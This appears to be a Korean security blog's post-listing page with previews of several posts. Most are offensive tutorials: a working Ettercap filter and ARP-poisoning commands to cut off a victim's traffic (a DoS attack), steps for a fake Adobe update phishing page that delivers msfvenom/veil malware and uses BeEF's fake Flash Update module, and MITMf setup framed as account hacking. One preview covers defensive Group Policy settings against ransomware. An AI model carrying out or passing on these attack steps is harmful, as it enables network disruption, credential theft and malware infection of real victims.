분류 전체보기257 도스 공격하는 방법 feat. Ettercap dos.elt if (ip.src == '192.168.0.8' || ip.dst == '192.168.0.8') { drop(); kill(); msg("도스 공격중\n"); } 1.dos.elt를 메모장으로 생성 후 아이피 주소 부분을 피해자 아이피로 두개 다 변경해준뒤 저장합니다. 2.dos.elt 파일이 있는 경로로 이동 후 etterfilter dos.elt -o dos.ef [dos.ef로 바꾸어주어 ettercap에서 사용하도록 만듭니다.] 3.ettercap -i eth0 -T -q -F dos.ef -M ARP //// [상세 사용법] https://blog.naver.com/PostView.naver?blogId=dhwkffk&logNo=221977220688&parentCategor.. 2023. 12. 27. 랜섬웨어 예방법 - 그룹 보안정책 설정 랜섬웨어를 예방할수 있는 방법! /* CTB Locker - Crito 락커 데이터파일이나 문서파일을 암호화시키는 랜섬웨어 주요 공격대상 - windows 운영체제 토르서버와 통신하여 명령 및 지원을 받으며, 확장자가 exe로 된 랜덤파일이 생기고 컴퓨터 로그인 시마다 작업관리자에 프로세스가 랜덤으로 실행됨 */ 이 예방법은 .exe 랜섬웨어 파일을 랜덤하게 여러곳에 숨겨서 만드는것을 막기 위해서 숨겨지는 path의 exe 그룹 보안 정책을 허용 안함으로 설정해서 예방하는 방법입니다. 제어판 - 관리도구 - 그룹 정책 편집 - (컴퓨터구성-windows설정-보안 설정-소프트웨어 제한 정책-추가 규칙) 추가 규칙에 오른쪽 클릭하여 새 경로 규칙 만들기를 눌러주고 랜섬웨어가 생성되는 경로에 ex)%AppDa.. 2023. 12. 27. 피싱사이트 [어도비 업데이트 버튼 악성코드] html 코드 및 beef의 fake Flash Update 기능 [코드] AdobeUpdate.exe 바이러스를 만든 뒤(veil 이나 msfvenom) /var/www/html에 넣어두고 페이지를 열면 adobe.jpeg [미리 만들어둔 adobe 페이크 이미지] 와 함께 피싱페이지가 나오고 버튼을 누르면 바이러스가 다운로드 된다. 하지만 좀 더 레벨 높은 해킹을 위해 beef의 fake Flash Update 기능을 사용한다. social engineering 목록에 있으며, image 란은 http://192.168.0.8:3000/adobe/flash_update.png payload는 custom_payload custom payload URL 은 http://192.168.0.8 로 셋 해준뒤 execute를 눌러준다. 그러면 새로운 페이크 어도비 업데.. 2023. 12. 27. 계정을 해킹할때 사용하는 Man in the Middle 사용하기[mitmf] https://github.com/byt3bl33d3r/MITMf GitHub - byt3bl33d3r/MITMf: Framework for Man-In-The-Middle attacks Framework for Man-In-The-Middle attacks. Contribute to byt3bl33d3r/MITMf development by creating an account on GitHub. github.com 설치법 1.apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-d.. 2023. 12. 27. 이전 1 ··· 18 19 20 21 22 23 24 ··· 65 다음